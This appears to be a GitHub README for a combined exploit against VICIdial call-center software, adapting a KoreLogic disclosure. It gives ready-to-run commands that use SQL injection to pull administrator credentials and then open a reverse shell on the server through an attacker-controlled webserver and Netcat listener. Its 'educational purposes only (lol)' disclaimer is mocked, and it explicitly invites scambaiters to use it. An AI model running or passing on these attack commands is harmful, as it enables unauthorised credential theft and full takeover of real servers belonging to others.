This repository contains a combined exploit for two critical vulnerabilities discovered in **[VICIdial](https://vicidial.com)** by **[KoreLogic](https://korelogic.com)**:
These vulnerabilities allow an attacker to retrieve administrative credentials through SQLi and ultimately execute arbitrary code on the target server via an RCE attack.
To perform only the **SQL Injection** attack and retrieve the administrative credentials, use the following command:
```bash
python exploit.py -u https://example.org
```
### RCE Mode (Remote Code Execution)
Once you have the administrator credentials, or if you already know them, you can launch a full RCE attack by running the following command:
```bash
python exploit.py -b -u https://example.org \
-wh <webserverIP> -wp <webserverport> \
-lh <yourIP> -lp <yourlistenerport> \
-un <adminusername> -pw <adminpassword>
```
The `-b` option binds the reverse shell to your listener IP and port. This command will start a **Netcat** listener on the specified port and wait for an incoming reverse shell.
> ⚠️ Replace `<webserver IP>` and `<webserver port>` with the values of your malicious webserver (where you execute the exploit) used to capture the reverse shell or inject payloads.
## 🌐 Usage Example with a server
It’s recommended to use a server where you can open ports to listen for reverse shells. Below are examples for both SQLi and RCE:
- **Separation of vulnerabilities**: The tool clearly separates the execution of the **SQLi** and **RCE** functionalities, making it more flexible for different exploitation scenarios.
- **Cleaner output**: The output is more structured and easy to read, highlighting key steps and results.
- **Bug fixes**: Some bugs from the original exploit have been fixed to ensure smoother execution.
Special thanks to KoreLogic for the foundational work. This tool was adapted to improve ease of use, bug fixes, and better separation between the two vulnerabilities.
This tool is for **educational purposes** only (lol). Use of this exploit without explicit permission from the system owner is illegal. The author assumes no responsibility for the misuse of this tool. Scambaiters, you're welcome.